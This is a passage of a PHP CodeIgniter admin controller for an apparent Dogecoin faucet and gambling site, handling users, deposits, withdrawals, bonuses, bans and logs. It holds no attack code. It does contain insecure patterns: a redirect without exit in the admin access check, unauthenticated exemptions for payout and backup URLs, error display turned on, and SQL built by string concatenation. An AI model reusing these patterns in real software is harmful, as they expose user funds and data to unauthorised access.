<?php
set_time_limit(30);
ini_set('default_socket_timeout', 29);
include('GoogleAuthenticator.php');	
include('captcha.php');	
include('BitcoinECDSA.php');
include('phpmailer/Sendmail.php');
defined('BASEPATH') OR exit('No direct script access allowed');
date_default_timezone_set("UTC");
require_once(APPPATH .'geolite2/index.php');

//////////
ini_set('display_errors', 1);
ini_set('display_startup_errors', 1);
error_reporting(E_ALL);
//////////

class Backend extends CI_Controller {

	/**
	 * Index Page for this controller.
	 *
	 * Maps to the following URL
	 * 		http://example.com/index.php/welcome
	 *	- or -
	 * 		http://example.com/index.php/welcome/index
	 *	- or -
	 * Since this controller is set as the default controller in
	 * config/routes.php, it's displayed at http://example.com/
	 *
	 * So any other public methods not prefixed with an underscore will
	 * map to /index.php/welcome/<method_name>
	 * @see https://codeigniter.com/user_guide/general/urls.html
	 */
	
	public $user_info = null;	
	public $admin_settings = null;
	public $settings_file = 'application/controllers/settings.txt';
	public $sending_email_ip = '45.77.43.245';
	public $DOGE_price = 0.28;
	public $withdrawal_fee = 50000000;
	public $UNITS_PER_COIN = 100000000;
	public $COIN_DECIMALS = 8;
	
	public function __construct() {
		parent::__construct();
		$this->load->helper('url');
		$this->load->model('UserModel', 'User');
		$this->load->model('BanModel', 'Ban');
		$this->load->model('BonusModel', 'Bonus');
		$this->load->model('FaucetModel', 'Faucet');
		$this->load->model('GiftModel', 'Gift');
		$this->load->model('WalletModel', 'Wallet');
		$this->load->model('RequestModel', 'Request');
		$this->load->model('MessageModel', 'Message');
		$this->load->model('TicketModel', 'Ticket');
		$this->load->model('GameModel', 'Game');
		$this->load->model('ContestModel', 'Contest');
		$this->load->model('StatisticModel', 'Statistic');
		$this->load->model('NotificationModel', 'Notification');
		$this->load->model('LogModel', 'Log');
		$this->load->model('SurveyModel', 'Survey');
		$this->load->model('ConfirmationModel', 'Confirmation');
		$this->load->model('StaminaModel', 'Stamina'); //stamina feature
		$this->load->model('GroupModel', 'Group'); //group feature
		$this->load->library('CI_Minifier');
		$this->load->library('session');
		$this->load->driver('cache', ['adapter' => 'memcached', 'backup' => 'file']);
		$this->ci_minifier->init(0);
		$this->ci_minifier->enable_obfuscator();
		
		/** remember me **/
		if($this->session->userdata('user_info') == NULL) {
			if(isset($_COOKIE['remember_token'])) {
				$remember_token = $_COOKIE['remember_token'];
				$user_id = $this->User->get_user_id_by_token($remember_token);
				if($user_id != 0) {
					$this->user_info = $this->User->get_user_info_by_id($user_id);
					$this->session->set_userdata('user_info', $this->user_info);
				}
			}
		}
		/** remember me **/
		
		if($this->session->userdata('user_info') !== NULL) {
			$this->user_info = $this->session->userdata('user_info');
			$get_basic_user_info = $this->User->get_basic_user_info_by_id($this->user_info->user_id);
			foreach($get_basic_user_info as $key => $value){
				if($this->user_info->$key != $value) {
					$this->user_info->$key = $value;
				}
			}
			$this->session->set_userdata('user_info', $this->user_info);
		}
		if(($this->user_info == null || $this->user_info->user_role == 0) 
			&& strpos(current_url(), 'adm/autopay.php') === false
			&& strpos(current_url(), 'adm/confirm_payout.php') === false
			&& strpos(current_url(), 'adm/backup.php') === false
		) {
			header("Location: ".base_url()."faucet.php");
		}
		
		$this->load_admin_settings();
		
		//$DOGE_price = $this->get_cryptocurrency_price('DOGE');
		$DOGE_price = $this->get_DOGE_price_from_coingecko();
		if($DOGE_price != '' && $DOGE_price != 0) {
			$this->DOGE_price = $DOGE_price;
		}
		
		$allow_auto_cashback = $this->isSettingEnabled('allow_auto_cashback');
		if($allow_auto_cashback && date('N') != 1) {
			$this->disableSetting('allow_auto_cashback');
		}
		
		/*** auto backup ***/
		$this->process_backup_db();
		/*** auto backup ***/
		
		/*** confirm deposit requests ***/
		//$url = base_url().'adm/confirm_deposit_request.php';
		//$cmd = "curl -s -o /dev/null $url > /dev/null 2>&1 &";
		//exec($cmd);
		/*** confirm deposit requests ***/
		
	}
	
	public function load_admin_settings() {
		if (file_exists('application/controllers/admin_settings')) {
			$this->admin_settings = unserialize(file_get_contents('application/controllers/admin_settings'));
		} else {
			$this->admin_settings = array(
				'show_user_data'	=> array(
					'show_user_email'	=> 1,
					'show_user_name'	=> 1,
					'show_country'	=> 1,
					'show_referrer'	=> 1,
					'show_total_referrals'=> 1,
					'show_total_deposits'	=> 1,
					'show_total_withdrawals'	=> 1,
					'show_total_bonuses'	=> 1,
					'show_bets'		=> 1,
					'show_total_survey_rewards'		=> 1,
					'show_wins'		=> 1,
					'show_losses'	=> 1,
					'show_wagered'	=> 1,
					'show_balance'	=> 1,
					'show_accessed_time'	=> 1,
					'show_registered_time'	=> 1
				)
			);
			file_put_contents('application/controllers/admin_settings', serialize($this->admin_settings));
		}
	}
	
	public function dashboard() {
		if(rand(1, 100) <= 100) {
			$this->Game->clean_bet_data();
			$this->update_contest_data();
		}
		$web_statistic = $this->User->get_web_statistics();
		$online_users = $this->User->count_online_users();
		$online_premium_users = $this->User->count_online_premium_users();
		$games = $this->Statistic->get_statistics('games');
		$DOGE_price	= $this->DOGE_price;
		
		if(!$this->cache->get('daily_game_market')) {
			$daily_game_market = $this->Game->daily_game_market();
			$this->cache->save('daily_game_market', $daily_game_market, 3600);
		} else {
			$daily_game_market = $this->cache->get('daily_game_market');
		}
		
		if(!$this->cache->get('language_ratio')) {
			$language_ratio = $this->User->get_language_ratio();
			$this->cache->save('language_ratio', $language_ratio, 3600);
		} else {
			$language_ratio = $this->cache->get('language_ratio');
		}
		
		$data = array(
			'menu'			=> 'dashboard',
			'online_users'	=> $online_users,
			'online_premium_users'	=> $online_premium_users,
			'games'			=> $games,
			'language_ratio'	=> $language_ratio,
			'daily_game_market'	=> $daily_game_market,
			'DOGE_price'		=> $DOGE_price,
			'user_info' 		=> $this->user_info,
			'web_statistic'	=> $web_statistic
		);
		
		$this->load->view('admin/dashboard', $data);
	}
	
	public function users() {
		$page_no = 1;
		$search_key = '';
		$sorted_by = '';
		$search_order = '';
		
		//group feature
		$all_groups = $this->Group->get_all_groups();
		if($this->input->post_get('g') != '') {
			$group_id = $this->input->post_get('g');
		} else {
			$group_id = '';
		}
		//group feature
		
		if($this->input->post_get('p') != '') {
			$page_no = intval($this->input->post_get('p'));
		}
		if($this->input->post_get('k') != '') {
			$search_key = $this->input->post_get('k');
		}
		if($this->input->post_get('s') != '') {
			$sorted_by = $this->input->post_get('s');
			if($sorted_by != 'user_id' 
			&& $sorted_by != 'total_referrals' 
			&& $sorted_by != 'total_deposits' 
			&& $sorted_by != 'total_withdrawals'
			&& $sorted_by != 'profit' 
			&& $sorted_by != 'temp_bet_balance'
			&& $sorted_by != 'claims'
			&& $sorted_by != 'amount_claims'
			&& $sorted_by != 'total_bonuses' 
			&& $sorted_by != 'balance'
			&& $sorted_by != 'bets'
			&& $sorted_by != 'total_survey_rewards'
			&& $sorted_by != 'wagered'
			&& $sorted_by != 'registered_time'
			&& $sorted_by != 'accessed_time') {
				$sorted_by = '';
			}
		}
		if($this->input->post_get('o') != '') {
			$search_order = $this->input->post_get('o');
		}
		$search_users = $this->User->search_users($page_no, $search_key, $sorted_by, $search_order, $this->admin_settings['show_user_data'], $group_id);
		if($search_users != null) {
			$users = $search_users['data'];
			foreach($users as $row) {
				if(isset($row->registered_time)) {
					if(date('Y-m-d', $row->registered_time) == date('Y-m-d')) {
						$row->registered_time =  date('H:i:s A', $row->registered_time);
					} else {
						$row->registered_time =  date('Y-m-d', $row->registered_time);
					}
				}
				if(isset($row->accessed_time )) {
					if(date('Y-m-d', $row->accessed_time) == date('Y-m-d')) {
						$row->accessed_time  =  date('H:i:s A', $row->accessed_time);
					} else {
						$row->accessed_time  =  date('Y-m-d', $row->accessed_time);
					}
				}
				if(isset($row->balance )) {
					$row->balance  =  number_format($row->balance / $this->UNITS_PER_COIN, 0);
				}
				if(isset($row->wagered )) {
					$row->wagered  =  number_format($row->wagered / $this->UNITS_PER_COIN, 0);
				}
				if(isset($row->total_deposits )) {
					$row->total_deposits  =  number_format($row->total_deposits / $this->UNITS_PER_COIN, 0);
				}
				if(isset($row->total_withdrawals )) {
					$row->total_withdrawals  =  number_format($row->total_withdrawals / $this->UNITS_PER_COIN, 0);
				}
				if(isset($row->total_bonuses )) {
					$row->total_bonuses  =  number_format($row->total_bonuses / $this->UNITS_PER_COIN, 0);
				}
				if(isset($row->total_survey_rewards)) {
					$row->total_survey_rewards  =  number_format($row->total_survey_rewards  / $this->UNITS_PER_COIN, 0);
				}
			}
			$total_pages = $search_users['total_pages'];
			$statistics = $search_users['statistics'];
		} else {
			$users = null;
			$total_pages = 0;
			$statistics = null;
		}
		
		if(strpos($search_key, 'ref=') !== false) {
			$ref_id = intval(str_replace("ref=","", $search_key));
		}
		
		$data = array(
			'users'			=> $users,
			//group feature
			'all_groups'	=> $all_groups,
			'get_group'		=> $group_id,
			//group feature
			'pagination'	=> $this->create_pagination($page_no, $total_pages, base_url().'adm/users.php?k='.$search_key.'&s='.$sorted_by.'&o='.$search_order),
			'statistics'	=> $statistics,
			'search_key'	=> $search_key,
			'sorted_by'		=> $sorted_by,
			'search_order'	=> $search_order,
			'admin_settings'=> $this->admin_settings,
			'user_info' 	=> $this->user_info,
			'referrer'		=> $ref_id ?? 0,
			'menu'			=> 'users'
			
		);
		$this->load->view('admin/users', $data);
	}
	
	public function user_statistics() {
		$page_no = 1;
		$search_key = 'profit';
		$during = 'this_week';
		$sort_order = 'DESC';
		if($this->input->post_get('p') != '') {
			$page_no = intval($this->input->post_get('p'));
		}
		if($this->input->post_get('k') != '') {
			$search_key = $this->input->post_get('k');
		}
		if($this->input->post_get('t') != '') {
			$during = $this->input->post_get('t');
		}
		if($this->input->post_get('o') != '') {
			$sort_order = $this->input->post_get('o');
		}
		
		if($search_key == 'wagering_contest') {
			$users = array();
			if($during == 'this_week') {
				$contest_winner = $this->Contest->get_thisweek_contest_data();
			} else {
				$contest_winner = $this->Contest->get_lastweek_winners();
			}
			if($contest_winner != null) {
				$contest_winner = json_decode($contest_winner->data);
				foreach($contest_winner->wagering_contest as $wagering_contest) {
					if($wagering_contest->ip_address != '192.168.0.1' && isset($wagering_contest->reward)) {
						if(isset($wagering_contest->user_id)) {
							$user_id = $wagering_contest->user_id;
						} else {
							$user_id = $this->User->check_username_already_exists($wagering_contest->user_name);
						}
						$user = array(
							'user_id'	=> $user_id,
							'user_name'	=>  $wagering_contest->user_name,
							'wagered'	=>  number_format($wagering_contest->wagered_this_week / $this->UNITS_PER_COIN, 4),
							'reward'	=>  number_format($wagering_contest->reward / $this->UNITS_PER_COIN, 4),
							'paid'		=>  isset($wagering_contest->paid) ? 1 : 0,
						);
						array_push($users, (object)$user);
					}
				}
			}
		} else if($search_key == 'referral_contest') {
			$users = array();
			if($during == 'this_week') {
				$contest_winner = $this->Contest->get_thisweek_contest_data();
			} else {
				$contest_winner = $this->Contest->get_lastweek_winners();
			}
			if($contest_winner != null) {
				$contest_winner = json_decode($contest_winner->data);
				foreach($contest_winner->referral_contest as $referral_contest) {
					if($referral_contest->ip_address != '192.168.0.1' && isset($referral_contest->reward)) {
						if(isset($referral_contest->user_id)) {
							$user_id = $referral_contest->user_id;
						} else {
							$user_id = $this->User->check_username_already_exists($referral_contest->user_name);
						}
						$user = array(
							'user_id'	=> $user_id,
							'user_name'	=>  $referral_contest->user_name,
							'wagered'	=>  number_format($referral_contest->total_wagered / $this->UNITS_PER_COIN, 4),
							'reward'	=>  number_format($referral_contest->reward / $this->UNITS_PER_COIN, 4),
							'paid'		=>  isset($referral_contest->paid) ? 1 : 0,
						);
						array_push($users, (object)$user);
					}
				}
			}
		} else {
			$users = $this->User->advanced_search_users($page_no, $search_key, $during, $sort_order);
		}
		
		if($users != null) {
			if($search_key == 'profit') {
				$get_lastweek_winners = $this->Contest->get_lastweek_winners();
				if($get_lastweek_winners != null) {
					$get_lastweek_winners = json_decode($get_lastweek_winners->data);
					foreach($users as $user) {
						$contest_reward = 0;
						foreach($get_lastweek_winners->wagering_contest as $wagering_contest) {
							if($user->user_name == $wagering_contest->user_name && isset($wagering_contest->reward)) {
								$contest_reward += $wagering_contest->reward;
							}
						}
						foreach($get_lastweek_winners->referral_contest as $referral_contest) {
							if($user->user_name == $referral_contest->user_name && isset($referral_contest->reward)) {
								$contest_reward += $referral_contest->reward;
							}
						}
						$user->contest_reward = number_format($contest_reward / $this->UNITS_PER_COIN, 4);
					}
				}
			}
				
			
			$total_pages = 99;
		} else {
			$users = null;
			$total_pages = 0;
		}
		
		$data = array(
			'users'			=> $users,
			'pagination'	=> $this->create_pagination($page_no, $total_pages, base_url().'adm/user_statistics.php?k='.$search_key.'&t='.$during.'&o='.$sort_order),
			'search_key'	=> $search_key,
			'during'		=> $during,
			'sort_order'		=> $sort_order,
			'admin_settings'=> $this->admin_settings,
			'user_info' 		=> $this->user_info,
			'menu'			=> 'users'
			
		);
		$this->load->view('admin/user_statistics', $data);
	}
		
	public function profile() {
		$uid = intval($this->input->post_get('uid'));
		if($this->input->post_get('p') != '') {
			$page_no = intval($this->input->post_get('p'));
		} else {
			$page_no = 1; 
		}
		$transactions = $this->Request->load_user_transactions($uid, $page_no);
		$total_pages = ceil($this->Request->get_number_transactions($uid) / $this->Request->limit_entries);
		$pagination = $this->create_pagination($page_no, $total_pages, base_url().'adm/profile.php?uid='.$uid);
		$get_user_info = $this->User->get_user_info_by_id($uid);
		
		if($get_user_info == null) {
			$this->users();
			return;
		}
		
		//update country
		$country = GeoIp2CountryIsoCode($get_user_info->ip_address);
		if($country != $get_user_info->country) {
			$this->User->update_user_info_by_id($get_user_info->user_id, 'country', $country);
		}
		//update country

		if($get_user_info->user_token == '') {
			$get_relevant_users = array();
		} else {
			$get_relevant_users = $this->User->get_relevant_users($get_user_info->user_token);
		}
		$total_faucet_rewards = $get_user_info->amount_claims;
		$get_user_info->country = $this->User->getCountryName($get_user_info->country);
		$referring_urls = $this->User->get_referring_urls_by_referrer($get_user_info->user_id);
		$get_user_log_data = $this->Log->get_user_log_data($get_user_info->user_id);
		$count_users_same_password = $this->User->count_users_same_password($get_user_info->password);
		$total_survey_rewards = $get_user_info->total_survey_rewards;
		$get_profit_lastweek = $this->Request->get_profit_lastweek_by_userid($get_user_info->user_id);
		if($get_user_info->total_referrals > 0) {
			$get_profit_lastweek_from_referrals = $this->Request->get_profit_lastweek_from_referrals($get_user_info->user_id);
		} else {
			$get_profit_lastweek_from_referrals = 0;
		}
		
		$get_user_request_summary = $this->Request->get_user_request_summary($get_user_info->user_id);
		if($get_user_request_summary != null) {
			if($get_user_info->total_deposits != $get_user_request_summary->total_deposits) {
				$this->User->update_user_info_by_id($get_user_info->user_id, 'total_deposits', $get_user_request_summary->total_deposits);
				$get_user_info->total_deposits = $get_user_request_summary->total_deposits;
			}
			if($get_user_info->total_withdrawals != $get_user_request_summary->total_withdrawals) {
				$this->User->update_user_info_by_id($get_user_info->user_id, 'total_withdrawals', $get_user_request_summary->total_withdrawals);
				$get_user_info->total_withdrawals = $get_user_request_summary->total_withdrawals;
			}
			if($get_user_info->pending_balance != $get_user_request_summary->pending_balance) {
				$this->User->update_user_info_by_id($get_user_info->user_id, 'pending_balance', $get_user_request_summary->pending_balance);
				$get_user_info->pending_balance = $get_user_request_summary->pending_balance;
			}
		}
		
		$is_spammer = $this->Ban->check_block_email($get_user_info->user_email);
		
		//group feature
		$user_groups = $this->Group->get_user_groups($get_user_info->user_id);
		$groups_not_joined = $this->Group->get_groups_not_joined_by_user($get_user_info->user_id);
		//group feature
		
		///////////////
		$request_id = $this->Request->get_confirmed_processing_request($uid);
		if($request_id != 0) {
			$request_info = $this->Request->get_request_info_by_id($request_id);
			$amount = $request_info->amount;
			$USD_value = number_format(floatval($amount / $this->UNITS_PER_COIN * $this->DOGE_price), 2, '.', '');
			$this->Request->complete_deposit_request($request_id, $USD_value);
			$this->User->update_user_info_by_id($uid, 'balance', $get_user_info->balance + $amount);
			$this->User->update_user_info_by_id($uid, 'processing_balance', $get_user_info->processing_balance - $amount);
			$this->User->update_user_info_by_id($uid, 'total_deposits', $get_user_info->total_deposits + $amount);
			$this->Wallet->update_amount_transferred($request_info->address, $amount);
			$deposits_today = $this->Statistic->get_statistic_by_date('deposits', date("Y-m-d"));
			$this->Statistic->set_statistic_by_date('deposits', $deposits_today + $amount, date("Y-m-d"));
		}
		///////////////
		
		
		
		$data = array(
			'get_user_info'	=> $get_user_info,
			'transactions'	=> $transactions,
			'get_relevant_users'	=> $get_relevant_users,
			'pagination'	=> $pagination,
			'admin_settings'=> $this->admin_settings,
			'referring_urls'	=> $referring_urls,
			'total_faucet_rewards'	=> $total_faucet_rewards,
			'total_survey_rewards'	=> $total_survey_rewards - $get_user_info->uncredited_survey_rewards,
			'count_users_same_password'	=> $count_users_same_password,
			'deposit_address'	=> $this->Wallet->get_deposit_address_by_user_id($get_user_info->user_id),	
			'menu'			=> 'users',
			'user_info' 		=> $this->user_info,
			'get_user_log_data'	=> $get_user_log_data,
			'get_profit_lastweek'	=> $get_profit_lastweek,
			'get_profit_lastweek_from_referrals'	=> $get_profit_lastweek_from_referrals,
			'is_spammer'		=> $is_spammer,
			'stamina_enabled'	=> $this->Stamina->is_stamina_active($uid), //stamina feature
			'claim_rate'		=> $this->Log->get_faucet_claim_rate($uid),
			'user_groups'		=> $user_groups, //group feature
			'groups_not_joined'	=> $groups_not_joined, //group feature
			
		);
		$this->load->view('admin/profile', $data);
	}

	public function deposits() {
		$txid = $this->input->post_get('txid');
		if($txid != '') {
			$transaction_info = $this->blockdaemon_get_transaction_info($txid);
			if($transaction_info != null) {
				$deposit_addresses = '';
				foreach($transaction_info['outputs'] as $address => $amount) {
					$deposit_addresses .= "'".$address."', ";
				}
				$deposit_addresses = trim($deposit_addresses, " ,");
			
				$wallets = $this->Wallet->get_all_deposit_wallets($deposit_addresses);
				$credited_transactions = $this->Request->get_all_requests_by_txid2($txid);
				$uncredited_transactions = array();
				if(is_array($credited_transactions)) {
					foreach($credited_transactions as $row) {
						if($row->time - time() < 86400) {
							$row->time =  $this->time_elapsed_string($row->time);
						} else {
							$row->time =  date('H:i:s (d/m)', $row->time);
						}
					}
				}
				if(is_array($wallets)) {
					for($i = 0; $i < count($wallets); $i++) {
						$check_credited = 0;
						if(is_array($credited_transactions)) {
							foreach($credited_transactions as $row) {
								if($row->address == $wallets[$i]->address) {
									$check_credited = 1;
									break;
								}
							}
						}
						if(!$check_credited) {
							$user_id = $wallets[$i]->user_id;
							$user_info = $this->User->get_user_info_by_id($user_id);
							$address = $wallets[$i]->address;
							$amount = $transaction_info['outputs'][$address];
							$request_id = $this->Request->create_request($user_id, 'Deposit', $amount, $address, $txid);
							$this->Request->complete_deposit_request($request_id);
							$this->User->update_user_info_by_id($user_info->user_id, 'balance', $user_info->processing_balance + $amount);
							$this->User->update_user_info_by_id($user_info->user_id, 'total_deposits', $user_info->total_deposits + $amount);
							array_push($uncredited_transactions, array(
								'id'		=> $request_id,
								'uid'		=> $user_id,
								'type'		=> 'Deposit',
								'amount'	=> $amount,
								'address'	=> $address,
								'txid'		=> $txid,
								'time'		=> $transaction_info['time'],
								'status'	=> 'Uncredited',
								'user_name'	=> $user_info->user_name,
								'note'		=> '',
								'country'	=> $this->User->getCountryName($user_info->country),
								'confirmations'	=> 1
							));
						}
					}
				}
				if(count($uncredited_transactions) > 0) {
					$transactions = $this->Request->get_all_requests_by_txid2($txid);
				} else {
					$transactions = $credited_transactions;
				}
			
			} else {
				$transactions = null;
			}
			
			$pagination = $this->create_pagination(1, 1, base_url().'adm/deposits.php?txid='.$txid);
			$data = array(
				'transactions'	=> $transactions,
				'pagination'	=> $pagination,
				'admin_settings'=> $this->admin_settings,
				'statistics'	=> (object)array('total_requests' => 0, 'total_amount' => 0),
				'DOGE_price'		=> $this->DOGE_price,
				'user_info' 	=> $this->user_info,
				'txid'			=> $txid,
				'menu'			=> 'deposits'
				
			);
			$this->load->view('admin/deposits', $data);
		} else {
			if($this->input->post_get('p') != '') {
				$page_no = intval($this->input->post_get('p'));
			} else {
				$page_no = 1; 
			}
			if($this->input->post_get('uid') != '') {
				$uid = $this->input->post_get('uid');
			} else {
				$uid = 0; 
			}
			if($this->input->post_get('status') != '') {
				$status = $this->input->post_get('status');
			} else {
				$status = 'All'; 
			}
			$statistics = $this->Request->get_request_statistics($uid, 'Deposit', $status);

			if(isset($_COOKIE['hide_internal_tx']) && $_COOKIE['hide_internal_tx'] == 1) {
				$hide_internal_tx = 1;
			} else {
				$hide_internal_tx = 0;
			}
			$transactions = $this->Request->load_user_transactions($uid, $page_no, 'Deposit', $status, $hide_internal_tx);
			$total_pages = ceil(intval($statistics->total_requests)   / $this->Request->limit_entries);
			$pagination = $this->create_pagination($page_no, $total_pages, base_url().'adm/deposits.php?status='.$status.'&uid='.$uid);
			if(is_array($transactions)) {
				foreach($transactions as $row) {
					if($row->time - time() < 86400) {
						$row->time =  $this->time_elapsed_string($row->time);
					} else {
						$row->time =  date('Y-m-d', $row->time);
					}
				}
			}
			//$DOGE_price = $this->get_cryptocurrency_price('DOGE');
			$DOGE_price	= $this->DOGE_price;
			$data = array(
				'transactions'	=> $transactions,
				'pagination'	=> $pagination,
				'admin_settings'=> $this->admin_settings,
				'statistics'	=> $statistics,
				'DOGE_price'	=> $DOGE_price,
				'user_info' 	=> $this->user_info,
				'txid'			=> $txid,
				'menu'			=> 'deposits'
				
			);
			$this->load->view('admin/deposits', $data);
		}
	}
	
	public function withdrawals() {
		if($this->input->post_get('p') != '') {
			$page_no = intval($this->input->post_get('p'));
		} else {
			$page_no = 1; 
		}
		if($this->input->post_get('uid') != '') {
			$uid = $this->input->post_get('uid');
		} else {
			$uid = 0; 
		}
		if($this->input->post_get('status') != '') {
			$status = $this->input->post_get('status');
		} else {
			$status = 'Completed';
		}
		$statistics = $this->Request->get_request_statistics($uid, 'Withdrawal', $status);
		if(isset($_COOKIE['hide_internal_tx']) && $_COOKIE['hide_internal_tx'] == 1) {
			$hide_internal_tx = 1;
		} else {
			$hide_internal_tx = 0;
		}
		
		if($uid != 0 && $status == 'Completed') {
			$completed_withdrawal_amount = $statistics->total_amount;
			$this->User->update_user_info_by_id($uid, 'total_withdrawals', $completed_withdrawal_amount);
		}
		
		$transactions = $this->Request->load_user_transactions($uid, $page_no, 'Withdrawal', $status, 0);
		$total_pages = ceil(intval($statistics->total_requests)   / $this->Request->limit_entries);
		$pagination = $this->create_pagination($page_no, $total_pages, base_url().'adm/withdrawals.php?status='.$status.'&uid='.$uid);
		if(is_array($transactions)) {
			foreach($transactions as $row) {
				if($row->time - time() < 86400) {
					$row->time =  $this->time_elapsed_string($row->time);
				} else {
					$row->time =  date('Y-m-d', $row->time);
				}
			}
		}
		$allow_auto_payout = $this->isSettingEnabled('allow_auto_payout');
		if(!$allow_auto_payout) {
			$allow_auto_payout = 0;
		}

		//$DOGE_price = $this->get_cryptocurrency_price('DOGE');
		$DOGE_price	= $this->DOGE_price;
		$data = array(
			'transactions'	=> $transactions,
			'pagination'	=> $pagination,
			'admin_settings'=> $this->admin_settings,
			'statistics'	=> $statistics,
			'DOGE_price'		=> $DOGE_price,
			'allow_auto_payout'	=> $allow_auto_payout,
			'last_auto_payout'	=> $this->time_elapsed_string(intval($this->getSettingData('last_auto_payout'))),
			'user_info' 		=> $this->user_info,
			'menu'			=> 'withdrawals'
			
		);
		$this->load->view('admin/withdrawals', $data);
	}	
	
	public function bonuses() {
		if($this->input->post_get('p') != '') {
			$page_no = intval($this->input->post_get('p'));
		} else {
			$page_no = 1; 
		}
		if($this->input->post_get('uid') != '') {
			$uid = intval($this->input->post_get('uid'));
		} else {
			$uid = 0; 
		}
		$statistics = $this->Bonus->get_statistics($uid);
		$bonuses = $this->Bonus->load_user_bonuses($uid, $page_no);
		$total_pages = ceil(intval($statistics->total_requests)   / $this->Bonus->limit_entries);
		if($uid != 0) {
			$pagination = $this->create_pagination($page_no, $total_pages, base_url().'adm/bonuses.php?uid='.$uid);
		} else {
			$pagination = $this->create_pagination($page_no, $total_pages, base_url().'adm/bonuses.php');
		}
		
		///12062024//
		$get_user_bonuses_by_dates = null;
		if($statistics->total_amount > 0) {
			$get_user_bonuses_by_dates = $this->Statistic->get_user_bonuses_by_dates($uid);
		}
		///12062024//
		
		//auto cashback 29092024
		$allow_auto_cashback = $this->isSettingEnabled('allow_auto_cashback');
		//auto cashback 29092024
		
		$data = array(
			'bonuses'		=> $bonuses,
			'pagination'	=> $pagination,
			'admin_settings'=> $this->admin_settings,
			'statistics'	=> $statistics,
			'user_id'		=> $uid,
			'user_info' 		=> $this->user_info,
			'get_user_bonuses_by_dates'	=> $get_user_bonuses_by_dates, ///12062024//
			'allow_auto_cashback'	=> $allow_auto_cashback,//auto cashback 29092024
			'DOGE_price'		=> $this->DOGE_price,
			'menu'			=> 'bonuses'
			
		);
		$this->load->view('admin/bonuses', $data);
	}	
	
	public function gifts() {
		if($this->input->post_get('p') != '') {
			$page_no = intval($this->input->post_get('p'));
		} else {
			$page_no = 1; 
		}
		if($this->input->post_get('uid') != '') {
			$uid = intval($this->input->post_get('uid'));
		} else {
			$uid = 0; 
		}
		$statistics = $this->Gift->get_statistics($uid);
		$gifts = $this->Gift->load_user_gifts($uid, $page_no);
		$total_pages = ceil(intval($statistics->total_gifts) / $this->Gift->limit_entries);
		if($uid != 0) {
			$pagination = $this->create_pagination($page_no, $total_pages, base_url().'adm/gifts.php?uid='.$uid);
		} else {
			$pagination = $this->create_pagination($page_no, $total_pages, base_url().'adm/gifts.php');
		}
		$data = array(
			'gifts'			=> $gifts,
			'pagination'	=> $pagination,
			'admin_settings'=> $this->admin_settings,
			'statistics'	=> $statistics,
			'user_id'		=> $uid,
			'user_info' 		=> $this->user_info,
			'menu'			=> 'gifts'
			
		);
		$this->load->view('admin/gifts', $data);
	}	
	
	public function bans() {
		if($this->input->post_get('p') != '') {
			$page_no = intval($this->input->post_get('p'));
		} else {
			$page_no = 1; 
		}
		if($this->input->post_get('uid') != '') {
			$uid = intval($this->input->post_get('uid'));
		} else {
			$uid = 0; 
		}
		$bans = $this->Ban->load_bans($page_no);
		$statistics = $this->Ban->get_statistics();
		$total_pages = ceil(intval($statistics->total_users) / $this->Gift->limit_entries);
		$pagination = $this->create_pagination($page_no, $total_pages, base_url().'adm/bans.php');
		
		$data = array(
			'bans'			=> $bans,
			'pagination'	=> $pagination,
			'admin_settings'=> $this->admin_settings,
			'user_id'		=> $uid,
			'user_info' 		=> $this->user_info,
			'menu'			=> 'bans'
		);
		$this->load->view('admin/bans', $data);
	}
	
	public function logs() {
		if($this->input->post_get('p') != '') {
			$page_no = intval($this->input->post_get('p'));
		} else {
			$page_no = 1; 
		}
		$search_key = '';
		if($this->input->post_get('s') != '') {
			$search_key = $this->input->post_get('s');
		}
		$logs = $this->Log->load_logs($search_key, $page_no);
		$pagination = $this->create_pagination($page_no, $logs['total_pages'], base_url().'adm/logs.php?s='.$search_key);
		$data = array(
			'logs'	=> $logs['data'],
			'admin_settings'=> $this->admin_settings,
			'pagination'	=> $pagination,
			'search_key'	=> $search_key,
			'user_info' 		=> $this->user_info,
			'menu'			=> 'logs'
		);
		$this->load->view('admin/logs', $data);
	}

	public function activities() {
		$action = 'Claim faucet';
		$time = 3600;
		$type = 'cookie';
		if($this->input->post_get('p') != '') {
			$page_no = intval($this->input->post_get('p'));
		} else {
			$page_no = 1; 
		}
		if($this->input->post_get('a') != '') {
			$action = $this->input->post_get('a');
			$action = str_replace("_"," ",$action);
		}
		if($this->input->post_get('t') != '') {
			$time = $this->input->post_get('t');
		}
		if($this->input->post_get('s') != '') {
			$type = $this->input->post_get('s');
		}
		$abnormal_activities = $this->Log->abnormal_activities($page_no, $action, $time, $type);
		if($abnormal_activities != null) {
			$activities = $abnormal_activities['data'];
			$pagination = $this->create_pagination($page_no, $abnormal_activities['total_pages'], base_url().'adm/activities.php?s='.$type.'&a='.$action.'&t='.$time);
		} else {
			$activities = null;
			$pagination = null;
		}
		
		$data = array(
			'activities'	=> $activities,
			'action'	=> $action,
			'time'		=> $time,
			'admin_settings'=> $this->admin_settings,
			'pagination'	=> $pagination,
			'type'		=> $type,
			'user_info' 		=> $this->user_info,
			'menu'			=> 'activities'
		);
		$this->load->view('admin/activities', $data);
	}

	public function notifications() {
		if($this->input->post_get('p') != '') {
			$page_no = intval($this->input->post_get('p'));
		} else {
			$page_no = 1; 
		}
		if($this->input->post_get('uid') != '') {
			$uid = intval($this->input->post_get('uid'));
		} else {
			$uid = 0; 
		}
		$notifications = $this->Notification->load_user_notifications($uid, $page_no);
		$total_pages = ceil($this->Notification->count_notifications($uid) / $this->Notification->limit_entries);
		$pagination = $this->create_pagination($page_no, $total_pages, base_url().'adm/notifications.php');
		
		$data = array(
			'notifications'		=> $notifications,
			'pagination'	=> $pagination,
			'admin_settings'=> $this->admin_settings,
			'user_id'		=> $uid,
			'user_info' 		=> $this->user_info,
			'menu'			=> 'notifications'
		);
		$this->load->view('admin/notifications', $data);
	}		
	
	public function tickets() {
		if($this->input->post_get('p') != '') {
			$page_no = intval($this->input->post_get('p'));
		} else {
			$page_no = 1; 
		}
		$email = $this->input->post_get('email');
		if($this->input->post_get('uid') != '') {
			$uid = intval($this->input->post_get('uid'));
		} else {
			$uid = 0; 
		}
		if (!filter_var($email, FILTER_VALIDATE_EMAIL)) {
			$email = '';
		}
		//$messages = $this->Message->load_user_messages($email, $page_no);
		$tickets = $this->Ticket->load_tickets($email, $uid, $page_no);
		if(is_array($tickets)) {
			foreach($tickets as $row) {
				if($row->updated_time - time() < 86400) {
					$row->updated_time =  $this->time_elapsed_string($row->updated_time);
				} else {
					$row->updated_time =  date('Y-m-d', $row->updated_time);
				}
			}
		}
		$count_tickets = $this->Ticket->count_tickets($email);
